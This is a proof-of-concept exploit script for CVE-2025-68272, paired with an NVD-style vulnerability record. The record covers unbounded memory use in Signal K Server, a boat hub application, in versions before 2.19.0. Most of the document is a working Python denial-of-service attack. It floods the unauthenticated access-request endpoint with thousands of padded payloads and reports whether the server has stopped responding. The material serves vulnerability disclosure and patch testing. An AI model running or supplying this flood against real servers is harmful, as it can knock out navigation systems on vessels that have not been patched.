CVE-2025-68272

#!/usr/bin/env python3 """ CVE-2025-68272 PoC - Signal K Server DoS Exploit Signal K Server < 2.19.0 - Unbounded Memory Consumption in /signalk/v1/access/requests """ import requests import time import sys TARGET_URL = "http://target-server:3000/signalk/v1/access/requests" NUM_REQUESTS = 10000 DELAY = 0.001 # Delay between requests in seconds def create_request_payload(request_id): """Create a malicious access request payload""" return { "clientId": f"malicious-client-{request_id}", "description": "Access request for navigation data", "permissions": ["read", "write"], "metadata": { "source": "poc-exploit", "timestamp": time.time(), "data": "x" * 1000 # Additional payload size } } def exploit_dos(): """Send rapid requests to exhaust server memory""" print(f"[*] Starting DoS attack against {TARGET_URL}") print(f"[*] Target: Signal K Server < 2.19.0") print(f"[*] Sending {NUM_REQUESTS} requests...") success_count = 0 error_count = 0 for i in range(NUM_REQUESTS): try: response = requests.post( TARGET_URL, json=create_request_payload(i), headers={"Content-Type": "application/json"}, timeout=5 ) success_count += 1 if i % 100 == 0: print(f"[*] Progress: {i}/{NUM_REQUESTS} requests sent") except requests.exceptions.RequestException as e: error_count += 1 if "Connection" in str(e) or "Timeout" in str(e): print(f"[!] Server may be down or unresponsive after {i} requests") break time.sleep(DELAY) print(f"\n[*] Attack completed") print(f"[*] Successful requests: {success_count}") print(f"[*] Errors: {error_count}") print(f"[!] Check if server is still responsive") if __name__ == "__main__": exploit_dos()

{"cve": {"id": "CVE-2025-68272", "sourceIdentifier": "[email protected]", "published": "2026-01-01T18:15:40.700", "lastModified": "2026-01-06T18:23:55.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Signal K Server is a server application that runs on a central hub in a boat. A Denial of Service (DoS) vulnerability in versions prior to 2.19.0 allows an unauthenticated attacker to crash the SignalK Server by flooding the access request endpoint (`/signalk/v1/access/requests`). This causes a \"JavaScript heap out of memory\" error due to unbounded in-memory storage of request objects. Version 2.19.0 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:signalk:signal_k_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.19.0", "matchCriteriaId": "102A9593-CCDC-4532-8201-E67EEFC665E0"}]}]}], "references": [{"url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-7rqc-ff8m-7j23", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}